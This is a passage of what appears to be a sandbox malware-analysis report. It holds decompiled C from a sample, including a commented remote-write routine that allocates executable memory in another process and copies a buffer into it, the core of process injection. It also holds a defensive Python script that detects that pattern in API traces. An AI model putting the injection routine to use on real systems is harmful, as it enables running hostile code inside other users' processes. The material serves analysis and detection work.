                          								// E005D68E0 is a bounded formatter: format string 0x2f when there is
                          								// no service pack, 0xaf with wServicePackMajor as an extra argument.
                          								if(_v416 == 0) {
                          									E005D4520( &_v208, 0x2f);
                          									_push( &_v408);
                          									E005D68E0(_t67, 0x100,  &_v208,  &_v892);
                          								} else {
                          									E005D4520( &_v208, 0xaf);
                          									_push(_v416 & 0x0000ffff);
                          									_push( &_v408);
                          									E005D68E0(_t67, 0x100,  &_v208,  &_v892);
                          								}
                          							}
                          							return _t67;
                          						}
                          						// 6.0 .. 6.3: jump table at M005C2220, one workstation and one server
                          						// string ID per minor version (wProductType != 1 means a server SKU).
                          						switch( *((intOrPtr*)(_t59 * 4 +  &M005C2220))) {
                          							case 0:
                          								if(_v410 != 1) {
                          									_t46 =  &_v892;
                          									_push(0xa1);
                          									goto L30;
                          								}
                          								if(_v410 != 1) {
                          									goto L29;
                          								}
                          								_t46 =  &_v892;
                          								_push(0xaa);
                          								goto L30;
                          							case 1:
                          								if(_v410 != 1) {
                          									_push(0xa0);
                          									goto L30;
                          								}
                          								if(_v410 != 1) {
                          									goto L29;
                          								}
                          								_push(0xa4);
                          								goto L30;
                          							case 2:
                          								if(_v410 != 1) {
                          									_push(0xa3);
                          									goto L30;
                          								}
                          								if(_v410 != 1) {
                          									goto L29;
                          								}
                          								_push(0xa6);
                          								goto L30;
                          							case 3:
                          								if(_v410 != 1) {
                          									_push(0xa2);
                          									goto L30;
                          								}
                          								if(_v410 != 1) {
                          									goto L29;
                          								}
                          								_push(0xa5);
                          								goto L30;
                          						}
                          					}
                          					if(_t44 != 0xa) {
                          						goto L29;
                          					}
                          					// Major version 10: string 0xa9 for server SKUs, 0xac for workstations
                          					if(_v410 != 1) {
                          						_t46 =  &_v892;
                          						_push(0xa9);
                          					} else {
                          						_t46 =  &_v892;
                          						_push(0xac);
                          					}
                          				}
                          			}

                          (Instruction address column for the C-Code above, 0x005c1fb8 to 0x005c2216; the line-by-line alignment with the decompiled code did not survive extraction.)

                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                          • Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
                          • Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
                          • Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: InfoSystem$NativeVersion
                          • String ID:
                          • API String ID: 2201459028-0
                          • Opcode ID: f47d77caa4ebed72f2fd60479935d7f9c12b55fbd27c709dd42e3bcfc0243f46
                          • Instruction ID: 3d612933a3e930c77a31359a85fa2df58f1778e703308f2f0d7880a8052eab30
                          • Opcode Fuzzy Hash: f47d77caa4ebed72f2fd60479935d7f9c12b55fbd27c709dd42e3bcfc0243f46
                          • Instruction Fuzzy Hash: 6251833260C384AEE631C695DC4AFAB7FD8BB96704F08091FF68496082E3B0DA44D753
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			// Remote-write primitive: commit an RWX region in the target process and
                          			// copy a buffer into it. Arguments are the target process handle (_a4), the
                          			// source buffer (_a8) and its length (_a12); the return value is the remote
                          			// base address, or NULL on any failure. The API trace shows it called from
                          			// 005CDA93.
                          			E005C9CD0(void* __eax, void* _a4, void* _a8, long _a12) {
                          				void* _t5;
                          				void* _t10;
                          				SIZE_T* _t11;
                          				void* _t12;
                          				void* _t13;
                          				long _t14;
                          				SIZE_T* _t15;
                          
                          				_t14 = _a12; // payload length
                          				_t10 = _a4;  // target process handle
                          				// 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE
                          				_t5 = VirtualAllocEx(_t10, 0, _t14, 0x3000, 0x40);
                          				_t13 = 0;
                          				if(_t5 != 0) {
                          					_t12 = _t5;
                          					_t11 = _t15; // lpNumberOfBytesWritten, kept on the stack
                          					 *_t11 = 0;
                          					// Fail closed: the write must succeed and every byte must land;
                          					// otherwise the region is released (0x8000 = MEM_RELEASE).
                          					if(WriteProcessMemory(_t10, _t12, _a8, _t14, _t11) == 0 ||  *_t15 != _t14) {
                          						VirtualFreeEx(_t10, _t12, 0, 0x8000);
                          					} else {
                          						_t13 = _t12;
                          					}
                          				}
                          				return _t13;
                          			}
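                          The sequence above (committed RWX allocation in a target process, immediately followed by WriteProcessMemory to the returned address, with the region released when the write comes up short) is the shape a detection should key on rather than any single API. The following is an added example, not code from this report or from the sample: a small Python trace analyser that flags exactly that pairing. The trace format it parses ("Api(arg, ...) -> retval") and the trace lines themselves are constructed for the example; a real deployment would adapt parse_line() to the sandbox's own export.

```python
import re

# Win32 memory-API constants as used by E005C9CD0.
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_EXECUTE_READWRITE = 0x40
# GetCurrentProcess() pseudo-handle on 32-bit and 64-bit Windows.
CURRENT_PROCESS_PSEUDO_HANDLES = {0xFFFFFFFF, 0xFFFFFFFFFFFFFFFF}

# Constructed trace line format for this example: "Api(arg, arg, ...) -> retval".
# This is not the sandbox's native export format.
LINE_RE = re.compile(r"^(\w+)\(([^)]*)\)\s*->\s*(0x[0-9a-fA-F]+|\d+)\s*$")


def parse_line(line):
    """Return (api_name, [int args], int retval), or None for a non-matching line."""
    m = LINE_RE.match(line.strip())
    if m is None:
        return None
    name, args, ret = m.groups()
    argv = [int(a.strip(), 0) for a in args.split(",") if a.strip()]
    return name, argv, int(ret, 0)


def find_rwx_writes(lines):
    """Flag every committed RWX VirtualAllocEx whose returned address later becomes
    the destination of a successful WriteProcessMemory on the same process handle.

    Returns a list of (hProcess, remote_address, bytes_requested, is_remote).
    A region freed before any write (the failure path in E005C9CD0) is dropped
    from the pending set and never reported."""
    pending = {}  # (hProcess, address) -> allocation size
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        name, argv, ret = rec
        if name == "VirtualAllocEx" and len(argv) >= 5 and ret != 0:
            hproc, _base, size, alloc_type, protect = argv[:5]
            if alloc_type & MEM_COMMIT and protect == PAGE_EXECUTE_READWRITE:
                pending[(hproc, ret)] = size
        elif name == "WriteProcessMemory" and len(argv) >= 4 and ret != 0:
            hproc, addr, _src, size = argv[:4]
            if (hproc, addr) in pending:
                is_remote = hproc not in CURRENT_PROCESS_PSEUDO_HANDLES
                hits.append((hproc, addr, size, is_remote))
        elif name == "VirtualFreeEx" and len(argv) >= 2:
            pending.pop((argv[0], argv[1]), None)
    return hits


# Constructed sample trace; these lines are not from the sandbox run above.
SAMPLE_TRACE = [
    "OpenProcess(0x1fffff, 0, 0x4d2) -> 0x2c4",
    "VirtualAllocEx(0x2c4, 0, 0x1000, 0x3000, 0x40) -> 0x400000",
    "WriteProcessMemory(0x2c4, 0x400000, 0x19f000, 0x1000, 0x19fe00) -> 1",
    "VirtualAllocEx(0x2c4, 0, 0x2000, 0x3000, 0x4) -> 0x500000",  # PAGE_READWRITE: not flagged
    "WriteProcessMemory(0x2c4, 0x500000, 0x19f000, 0x2000, 0x19fe00) -> 1",
    "VirtualAllocEx(0x2c4, 0, 0x100, 0x3000, 0x40) -> 0x600000",
    "VirtualFreeEx(0x2c4, 0x600000, 0, 0x8000) -> 1",  # released before any write: failure path
    "VirtualAllocEx(0xffffffff, 0, 0x800, 0x3000, 0x40) -> 0x700000",
    "WriteProcessMemory(0xffffffff, 0x700000, 0x19f000, 0x800, 0x19fe00) -> 1",  # self-process
]

if __name__ == "__main__":
    for hproc, addr, size, remote in find_rwx_writes(SAMPLE_TRACE):
        kind = "remote" if remote else "self"
        print(f"RWX write: hProcess=0x{hproc:x} addr=0x{addr:x} size=0x{size:x} ({kind})")
```

                          Keying on the allocate-then-write pair per (handle, address) keeps the rule quiet on JIT-style RWX allocations in a process's own address space that are never filled by WriteProcessMemory, while the is_remote flag separates the injection case from self-writes that still deserve a lower-severity note.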

                          (Instruction address column for the C-Code above, 0x005c9cd5 to 0x005c9d32; the line-by-line alignment with the decompiled code did not survive extraction.)

                          APIs
                          • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,00000000,?,00000000,?,?,005CDA93,?,?,00000080), ref: 005C9CE8
                          • WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,005CDA93,?,?,00000080), ref: 005C9D07
                          • VirtualFreeEx.KERNEL32(?,00000000,00000000,00008000,?,?,00000000,?,?,005CDA93,?,?,00000080), ref: 005C9D23
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                          • Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
                          • Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
                          • Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: Virtual$AllocFreeMemoryProcessWrite
                          • String ID:
                          • API String ID: 3247110995-0
                          • Opcode ID: e61a91aa5269a8144fd6352a65fde7eee7e7cc359513a2da5511482180a78dc7
                          • Instruction ID: 44dd4e77c0ce28ac895e09e980546e316561cd8836b3a4d7cf53524b1e82c642
                          • Opcode Fuzzy Hash: e61a91aa5269a8144fd6352a65fde7eee7e7cc359513a2da5511482180a78dc7
                          • Instruction Fuzzy Hash: 95F090B2241304BFE2305B66DC49F177F9CFB89B95F21042EFA46A6280D570EC04C671
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			// Heap allocator wrapper used throughout the sample. Caches the process
                          			// heap handle in the global at 0x5d9c2c on first use, then either allocates
                          			// a fresh block (_a8 == NULL) or grows an existing one (_a8 != NULL).
                          			E005C3180(signed int _a4, void* _a8) {
                          				void* _t3;
                          				long _t9;
                          				signed int _t10;
                          				void* _t11;
                          
                          				_t3 =  *0x5d9c2c; // 0x230000
                          				_t11 = _a8;  // existing block to resize, or NULL
                          				_t10 = _a4;  // requested size
                          				if(_t3 == 0) {
                          					_t3 = GetProcessHeap();
                          					 *0x5d9c2c = _t3;
                          				}
                          				// Pad the request using its inverted low nibble (16-byte granule intent).
                          				// Flags 8 = HEAP_ZERO_MEMORY, so every block comes back zeroed.
                          				_t9 = ( ~_t10 & 0x0000000f) + _t10;
                          				if(_t11 == 0) {
                          					return RtlAllocateHeap(_t3, 8, _t9);
                          				} else {
                          					return RtlReAllocateHeap(_t3, 8, _t11, _t9);
                          				}
                          			}

                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000000,005D2549,?,00000000,00000001,00000000), ref: 005C3193
                          • RtlReAllocateHeap.NTDLL(00230000,00000008,?,?), ref: 005C31B0
                          • RtlAllocateHeap.NTDLL(00230000,00000008,?), ref: 005C31BC
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                          • Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
                          • Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
                          • Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: Heap$Allocate$Process
                          • String ID:
                          • API String ID: 980559045-0
                          • Opcode ID: 3f4248359b9ea1d13bf8fe64649434834ee35c03843735ebf09ce33b0bc7a6b2
                          • Instruction ID: fb6bd6b1dab2198527e5a95d99b1f6c0ceaf73acee1920f970c0770c599a80bf
                          • Opcode Fuzzy Hash: 3f4248359b9ea1d13bf8fe64649434834ee35c03843735ebf09ce33b0bc7a6b2
                          • Instruction Fuzzy Hash: 95E065B2651210AFDB249B65EC09F5A7B98FBA4711B0C850FF401D7250DA705C049B60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 87%
                          			E005D5EB0(void* __ecx, void* __eflags) {
                          				signed char* _t133;
                          				intOrPtr _t134;
                          				signed int _t135;
                          				void* _t140;
                          				signed char _t144;
                          				signed char* _t146;
                          				signed char _t158;
                          				signed int _t161;
                          				intOrPtr _t163;
                          				signed int _t164;
                          				signed int _t165;
                          				signed int _t172;
                          				intOrPtr _t173;
                          				signed int _t174;
                          				signed int _t176;
                          				signed int _t177;
                          				signed int _t179;
                          				intOrPtr _t184;
                          				signed char* _t185;
                          				signed int _t186;
                          				void* _t187;
                          				signed int _t188;
                          				signed int _t190;
                          				signed int _t192;
                          				signed int _t193;
                          				signed int _t195;
                          				intOrPtr _t196;
                          				signed int _t197;
                          				signed char* _t198;
                          				signed int _t199;
                          				intOrPtr _t200;
                          				signed int _t204;
                          				signed int _t206;
                          				signed int _t208;
                          				signed int _t209;
                          				signed int _t210;
                          				signed int _t211;
                          				signed int* _t214;
                          				intOrPtr _t215;
                          				signed char* _t218;
                          				signed int _t219;
                          				intOrPtr _t220;
                          				signed int _t221;
                          				signed int* _t222;
                          				signed int _t227;
                          				WCHAR* _t229;
                          				signed int _t230;
                          				signed int _t235;
                          				signed int _t236;
                          				signed int _t237;
                          				signed int _t238;
                          				intOrPtr _t244;
                          				signed char* _t249;
                          				intOrPtr* _t250;
                          				intOrPtr* _t252;
                          				signed int _t253;
                          				intOrPtr _t254;
                          				intOrPtr _t255;
                          				signed int* _t258;
                          				signed int _t262;
                          				signed int* _t264;
                          				intOrPtr _t266;
                          				intOrPtr _t269;
                          				signed int _t270;
                          				signed int _t271;
                          				intOrPtr _t272;
                          				signed int _t273;
                          				signed char _t274;
                          				intOrPtr _t276;
                          				intOrPtr* _t277;
                          				signed int _t280;
                          				signed int _t284;
                          				signed int* _t285;
                          				void* _t286;
                          				signed int* _t290;
                          				signed int _t291;
                          				void* _t292;
                          				signed char _t293;
                          				signed int _t294;
                          				void* _t295;
                          				WCHAR* _t296;
                          				signed int _t297;
                          				signed int _t298;
                          				signed int _t299;
                          				signed int _t300;
                          				signed char* _t303;
                          				void* _t306;
                          				void* _t307;
                          				signed int* _t308;
                          				signed int* _t309;
                          				signed int* _t310;
                          				signed int* _t312;
                          				signed int* _t313;
                          
                          				_t286 = __ecx;
                          				_t235 = 0;
                          				_t302 = _t306 + 0x14;
                          				E005D6610(_t306 + 0x14, 0, 0x63c);
                          				_t307 = _t306 + 0xc;
                          				_t133 =  *0x5d9c08; // 0x27a400
                          				_t133[0x490] = 0;
                          				_t244 =  *0x5d9b0c; // 0x26f2b8
                          				 *(_t244 + 8) = 1;
                          				_t4 = _t244 + 0x24; // 0x0
                          				_t134 =  *_t4;
                          				if(_t134 == 0) {
                          					 *(_t244 + 8) = 2;
                          					_t135 = E005C5B70(0x83);
                          					_t308 = _t307 + 4;
                          					_t308[0xe] = _t135;
                          					L39:
                          					_t292 =  &(_t308[0x74]);
                          					_t303 =  *0x5d9c08; // 0x27a400
                          					_t62 =  &(_t303[0x10]); // 0x27a410
                          					_t303[8] =  *(_t292 - 0x188);
                          					_t303[0x494] =  *(_t292 - 0x198);
                          					_t303[0xc] =  *(_t292 - 0x19c);
                          					_t140 = memcpy(_t62, _t292, 0x20 << 2);
                          					_t309 =  &(_t308[3]);
                          					E005CC400(_t140,  &(_t309[0x94]), 0x400);
                          					_t310 =  &(_t309[3]);
                          					_t142 =  *_t303;
                          					if( *_t303 != 0) {
                          						E005C91E0(_t142);
                          						_t310 =  &(_t310[1]);
                          						_t303 =  *0x5d9c08; // 0x27a400
                          					}
                          					_t71 =  &(_t303[4]); // 0x0
                          					_t143 =  *_t71;
                          					if( *_t71 != 0) {
                          						E005C91E0(_t143);
                          						_t310 =  &(_t310[1]);
                          					}
                          					_t248 = _t310[7];
                          					_t293 = 0;
                          					_t144 = 0;
                          					if(_t310[7] != 0) {
                          						_t144 = E005CB7A0(_t248);
                          						_t310 =  &(_t310[1]);
                          					}
                          					_t249 =  *0x5d9c08; // 0x27a400
                          					 *_t249 = _t144;
                          					_t145 = _t310[8];
                          					if(_t310[8] != 0) {
                          						_t158 = E005CB7A0(_t145);
                          						_t310 =  &(_t310[1]);
                          						_t293 = _t158;
                          					}
                          					_t146 =  *0x5d9c08; // 0x27a400
                          					_t146[4] = _t293;
                          					if(_t310[5] == 0) {
                          						L50:
                          						_t147 = _t310[0x10];
                          						if(_t310[0x10] != 0) {
                          							E005C91E0(_t147);
                          							_t310 =  &(_t310[1]);
                          						}
                          						_t148 = _t310[0xf];
                          						if(_t310[0xf] != 0) {
                          							E005C91E0(_t148);
                          							_t310 =  &(_t310[1]);
                          						}
                          						_t149 = _t310[6];
                          						if(_t310[6] != 0) {
                          							E005C91E0(_t149);
                          							_t310 =  &(_t310[1]);
                          						}
                          						_t150 = _t310[0xb];
                          						if(_t310[0xb] != 0) {
                          							E005C91E0(_t150);
                          						}
                          						return _t235;
                          					} else {
                          						_t294 = 0;
                          						do {
                          							E005C91E0( *((intOrPtr*)(_t310[6] + _t294 * 4)));
                          							_t310 =  &(_t310[1]);
                          							_t294 = _t294 + 1;
                          						} while (_t294 < _t310[5]);
                          						goto L50;
                          					}
                          				}
                          				_t250 = _t307 + 0x650;
                          				_t295 = _t307 + 0x18;
                          				 *_t250 = 0x20;
                          				_push(0xffffffff);
                          				_push(_t295);
                          				_push(_t250);
                          				_push(_t134);
                          				_t161 = E005C9FF0();
                          				_t312 = _t307 + 0x10;
                          				 *(_t295 - 4) = _t161;
                          				if((_t161 & 0xfffffffe) != 2) {
                          					_t163 =  *0x5d9b0c; // 0x26f2b8
                          					 *(_t163 + 8) = 2;
                          					_push(0x84);
                          					L7:
                          					_t164 = E005C5B70();
                          					_t308 =  &(_t312[1]);
                          					_t308[0xe] = _t164;
                          					L8:
                          					_t235 = 0;
                          					goto L39;
                          				}
                          				_t165 = _t312[6];
                          				_t296 =  &(_t312[0x1c6]);
                          				_t312[7] =  *_t165;
                          				_t312[8] =  *(_t165 + 4);
                          				E005D4520(_t296, 0x80);
                          				_t313 =  &(_t312[2]);
                          				if(lstrcmpiW(_t313[9], _t296) == 0) {
                          					_t297 = 0;
                          					_t236 = 0;
                          					_t313[1] = 1;
                          				} else {
                          					E005D4520(_t296, 0x81);
                          					_t313 =  &(_t313[2]);
                          					if(lstrcmpiW(_t313[9], _t296) == 0) {
                          						_t236 = 0;
                          						_t297 = 1;
                          						__eflags = 1;
                          					} else {
                          						E005D4520(_t296, 0x82);
                          						_t313 =  &(_t313[2]);
                          						_t236 = 0 | lstrcmpiW(_t313[9], _t296) == 0x00000000;
                          						_t297 = 0;
                          					}
                          					_t313[1] = 0;
                          				}
                          				if(_t313[5] != 3) {
                          					L22:
                          					_t172 = E005D2E70( *((intOrPtr*)( &(_t313[0x10]) - 0x20)), 0,  &(_t313[0x10]), 0xffffffff);
                          					_t312 =  &(_t313[4]);
                          					__eflags = _t172;
                          					if(_t172 == 0) {
                          						_t173 =  *0x5d9b0c; // 0x26f2b8
                          						 *(_t173 + 8) = 2;
                          						_push(0x86);
                          						goto L7;
                          					}
                          					_t252 =  *0x5d9a94; // 0x0
                          					_t312[3] = _t297;
                          					 *_t312 = _t236;
                          					_t174 = E005C49B0(_t252, _t312[7]);
                          					__eflags = _t312[1];
                          					_t298 = _t174;
                          					if(_t312[1] == 0) {
                          						_t237 = 0;
                          						_t253 = 0;
                          						L35:
                          						__eflags = _t298;
                          						if(_t298 != 0) {
                          							L61:
                          							_t238 = _t253;
                          							_t176 = E005D2E70( *((intOrPtr*)(_t298 + 8)), 0,  &(_t312[0xf]), 0xffffffff);
                          							_t308 =  &(_t312[4]);
                          							__eflags = _t176;
                          							if(__eflags == 0) {
                          								goto L19;
                          							}
                          							_t255 =  *0x5d9a94; // 0x0
                          							_t179 = E005D20F0(_t255, __eflags, _t298,  &(_t308[0x13]));
                          							__eflags = _t179;
                          							if(_t179 == 0) {
                          								_push(0x87);
                          								goto L20;
                          							}
                          							__eflags = _t308[1];
                          							if(_t308[1] == 0) {
                          								__eflags = _t308[3] |  *_t308;
                          								if((_t308[3] |  *_t308) == 0) {
                          									__eflags =  *(_t298 + 0x18);
                          									if( *(_t298 + 0x18) == 0) {
                          										_push(_t286);
                          										E005C38E0(_t298, _t302);
                          										_t308 =  &(_t308[3]);
                          									} else {
                          										E005CD950( *((intOrPtr*)(_t298 + 0x48)), _t298, _t302, _t286);
                          									}
                          									L99:
                          									_t235 = 1;
                          									goto L39;
                          								}
                          								_t184 =  *0x5d9b0c; // 0x26f2b8
                          								_t235 = 1;
                          								 *((intOrPtr*)(_t184 + 8)) = 1;
                          								_t185 =  *0x5d9c08; // 0x27a400
                          								_t185[0x490] = 1;
                          								__eflags =  *(_t298 + 0x18);
                          								if( *(_t298 + 0x18) == 0) {
                          									_t186 = E005D3420(_t298);
                          									__eflags = _t186;
                          									if(_t186 == 0) {
                          										_t187 = 0x89;
                          										L107:
                          										_t188 = E005C5B70(_t187);
                          										_t308 =  &(_t308[1]);
                          										_t308[0xe] = _t188;
                          										L108:
                          										_t258 =  *0x5d9a94; // 0x0
                          										_push( *_t308);
                          										L109:
                          										_push(1);
                          										_push(_t298);
                          										E005CD6B0(_t258);
                          										goto L39;
                          									}
                          									_t190 = E005C1F50(_t186, _t298);
                          									__eflags = _t190;
                          									if(_t190 != 0) {
                          										goto L108;
                          									}
                          									_t187 = 0x8d;
                          									goto L107;
                          								}
                          								E005D0090(_t185,  *((intOrPtr*)(_t298 + 0x48)), _t298,  *_t308);
                          								goto L39;
                          							}
                          							_t192 = E005D3420(_t298);
                          							_t262 = _t298;
                          							__eflags = _t192;
                          							if(_t192 == 0) {
                          								_push(0);
                          								_t290 =  &(_t308[0x195]);
                          								L80:
                          								_push(_t290);
                          								_t193 = E005D1F80(_t262);
                          								__eflags = _t193;
                          								if(_t193 != 0) {
                          									L87:
                          									_t235 = 0;
                          									_t195 = E005CC110(_t298,  *((intOrPtr*)( &(_t308[0x94]) - 0x214)),  *((intOrPtr*)( &(_t308[0x94]) - 0x224)),  *((intOrPtr*)( &(_t308[0x94]) - 0x220)),  &(_t308[0x94]),  &(_t308[0x16]), 0, 0, 0);
                          									__eflags = _t195;
                          									if(_t195 == 0) {
                          										_t196 =  *0x5d9b0c; // 0x26f2b8
                          										 *((intOrPtr*)(_t196 + 8)) = 7;
                          										_t197 = E005C5B70(0x8b);
                          										_t308 =  &(_t308[1]);
                          										_t258 =  *0x5d9a94; // 0x0
                          										_t308[0xe] = _t197;
                          										_push(0);
                          										goto L109;
                          									}
                          									_t198 =  *0x5d9c08; // 0x27a400
                          									_t198[0x490] = 1;
                          									goto L99;
                          								}
                          								_t199 = E005CB7A0(_t290);
                          								_t308 =  &(_t308[1]);
                          								_t308[0xe] = _t199;
                          								_t200 =  *0x5d9b0c; // 0x26f2b8
                          								 *((intOrPtr*)(_t200 + 8)) = 7;
                          								_t264 =  *0x5d9a94; // 0x0
                          								_push(1);
                          								_push(1);
                          								L105:
                          								_push(_t298);
                          								E005CD6B0(_t264);
                          								goto L8;
                          							}
                          							_t204 = E005C1F50(_t192, _t262);
                          							__eflags = _t204;
                          							_t290 =  &(_t308[0x194]);
                          							if(_t204 == 0) {
                          								__eflags =  *(_t298 + 0x30);
                          								if(__eflags == 0) {
                          									E005D5C10(_t298, __eflags);
                          									_t262 = _t298;
                          									_push(0);
                          									goto L80;
                          								}
                          								_t206 = E005C5B70(0x8a);
                          								_t308 =  &(_t308[1]);
                          								_t266 =  *0x5d9b0c; // 0x26f2b8
                          								_t308[0xe] = _t206;
                          								 *((intOrPtr*)(_t266 + 8)) = 1;
                          								_t264 =  *0x5d9a94; // 0x0
                          								_push(0);
                          								_push(1);
                          								goto L105;
                          							}
                          							__eflags = _t238;
                          							if(__eflags == 0) {
                          								E005D5C10(_t298, __eflags);
                          								_t208 = E005D1F80(_t298, _t290, 0);
                          								__eflags = _t208;
                          								if(_t208 == 0) {
                          									_t209 = E005CB7A0(_t290);
                          									_t308 =  &(_t308[1]);
                          									_t269 =  *0x5d9b0c; // 0x26f2b8
                          									_t308[0xe] = _t209;
                          									 *((intOrPtr*)(_t269 + 8)) = 7;
                          									_t264 =  *0x5d9a94; // 0x0
                          									_push(0);
                          									_push(1);
                          									goto L105;
                          								}
                          								goto L87;
                          							}
                          							_t210 = E005C3180(0x400, 0);
                          							_t308 =  &(_t308[2]);
                          							_t308[0xe] = _t210;
                          							_t211 = _t210 + 0xfffffffe;
                          							__eflags = _t211;
                          							_t284 = 0xfffffe00;
                          							_t270 = _t308[7];
                          							while(1) {
                          								_t299 =  *(_t270 + 0x400 + _t284 * 2) & 0x0000ffff;
                          								__eflags = _t299;
                          								if(_t299 == 0) {
                          									break;
                          								}
                          								 *(_t211 + 2) = _t299;
                          								_t211 = _t211 + 2;
                          								_t284 = _t284 + 1;
                          								__eflags = _t284;
                          								if(_t284 != 0) {
                          									continue;
                          								}
                          								L103:
                          								 *_t214 = 0;
                          								L38:
                          								_t215 =  *0x5d9b0c; // 0x26f2b8
                          								_t235 = 0;
                          								__eflags = 0;
                          								 *(_t215 + 8) = 1;
                          								goto L39;
                          							}
                          							 *(_t211 + 2) = 0;
                          							E005D4520( &(_t308[0x1c7]), 0x8c);
                          							_t308 =  &(_t308[2]);
                          							_t285 = _t308[0xe];
                          							_t271 = 0x200;
                          							while(1) {
                          								__eflags =  *_t285;
                          								if( *_t285 == 0) {
                          									break;
                          								}
                          								_t285 =  &(_t285[0]);
                          								_t271 = _t271 - 1;
                          								__eflags = _t271;
                          								if(_t271 != 0) {
                          									continue;
                          								}
                          								goto L38;
                          							}
                          							_t300 = 0;
                          							__eflags = 0;
                          							while(1) {
                          								_t291 =  *(_t308 + 0x718 + _t300 * 2) & 0x0000ffff;
                          								_t214 = _t285;
                          								__eflags = _t291;
                          								if(_t291 == 0) {
                          									goto L103;
                          								}
                          								_t300 = _t300 + 1;
                          								_t285 =  &(_t214[0]);
                          								 *_t214 = _t291;
                          								__eflags = _t271 - _t300;
                          								if(_t271 != _t300) {
                          									continue;
                          								}
                          								goto L103;
                          							}
                          							goto L103;
                          						}
                          						L36:
                          						__eflags =  *_t312 | _t312[3];
                          						if(( *_t312 | _t312[3]) == 0) {
                          							_t312[2] = _t253;
                          							_t272 =  *0x5d9a94; // 0x0
                          							_t218 =  &(_t312[4]);
                          							 *_t218 = 0;
                          							_push(_t218);
                          							_t219 = E005D3AC0(_t272, _t280, _t312[9], _t237);
                          							__eflags = _t219;
                          							if(_t219 == 0) {
                          								__eflags = _t312[4] - 1;
                          								if(_t312[4] == 1) {
                          									_t220 =  *0x5d9b0c; // 0x26f2b8
                          									 *((intOrPtr*)(_t220 + 8)) = 4;
                          								}
                          								_push(0x85);
                          								goto L7;
                          							}
                          							_t253 = _t312[2];
                          							_t298 = _t219;
                          							goto L61;
                          						}
                          						_t221 = E005C5B70(0x89);
                          						_t308 =  &(_t312[1]);
                          						_t308[0xe] = _t221;
                          						goto L38;
                          					}
                          					_t222 = _t312[8];
                          					_t237 = 0;
                          					_t273 =  *_t222;
                          					__eflags = _t273 - 0x740073;
                          					if(_t273 == 0x740073) {
                          						__eflags = _t222[1] - 0x720041;
                          						_t51 = _t222[1] == 0x720041;
                          						__eflags = _t51;
                          						_t274 = _t273 & 0xffffff00 | _t51;
                          					} else {
                          						__eflags = _t273 - 0x540073;
                          						_t274 = 0;
                          						if(_t273 == 0x540073) {
                          							__eflags = _t222[1] - 0x720061;
                          							_t237 = 0 | _t222[1] == 0x00720061;
                          							_t274 = _t237;
                          						}
                          					}
                          					_t253 = _t274 & 0x000000ff;
                          					__eflags = _t298;
                          					if(_t298 == 0) {
                          						goto L35;
                          					} else {
                          						__eflags = _t237 | _t253;
                          						if((_t237 | _t253) != 0) {
                          							goto L35;
                          						}
                          						_t312[2] = _t253;
                          						do {
                          							E005CDCC0(_t298,  *((intOrPtr*)(_t298 + 0x44)));
                          							_t276 =  *0x5d9a94; // 0x0
                          							E005D6660(_t276, _t312[8], 1);
                          							_t277 =  *0x5d9a94; // 0x0
                          							_t227 = E005C49B0(_t277, _t312[7]);
                          							_t298 = _t227;
                          							__eflags = _t227;
                          						} while (_t227 != 0);
                          						_t253 = _t312[2];
                          						goto L36;
                          					}
                          				} else {
                          					_t229 =  *(_t313[6] + 8);
                          					_t313[9] = _t229;
                          					if(_t229 == 0) {
                          						L18:
                          						_t313[0xa] = 0;
                          						L19:
                          						_push(0x86);
                          						L20:
                          						_t177 = E005C5B70();
                          						_t308 =  &(_t308[1]);
                          						_t254 =  *0x5d9b0c; // 0x26f2b8
                          						_t308[0xe] = _t177;
                          						_t235 = 0;
                          						 *(_t254 + 8) = 2;
                          						goto L39;
                          					}
                          					_t280 = 0;
                          					while(_t229[_t280] != 0) {
                          						_t280 = _t280 + 1;
                          						if(_t280 != 0x7fffffff) {
                          							continue;
                          						}
                          						_t313[0xa] = 0;
                          						goto L18;
                          					}
                          					 *( &(_t313[0xc]) - 8) = _t280;
                          					_t302 =  &(_t313[7]);
                          					_t230 = E005D08A0(_t229, _t229, _t280,  &(_t313[0xc]),  &(_t313[0xc]));
                          					__eflags = _t230;
                          					if(_t230 == 0) {
                          						_push(0x88);
                          						goto L20;
                          					}
                          					goto L22;
                          				}
                          			}

                          Instruction address range for the function above: 0x005d5eba - 0x005d65f1

                          APIs
                          • lstrcmpiW.KERNEL32(?,?), ref: 005D5F4C
                          • lstrcmpiW.KERNEL32(?,?), ref: 005D5F6D
                          • lstrcmpiW.KERNEL32(?,?), ref: 005D5F8A
                            • Part of subcall function 005D5C10: CloseHandle.KERNEL32(?), ref: 005D5C30
                            • Part of subcall function 005D5C10: CloseHandle.KERNEL32(?), ref: 005D5C45
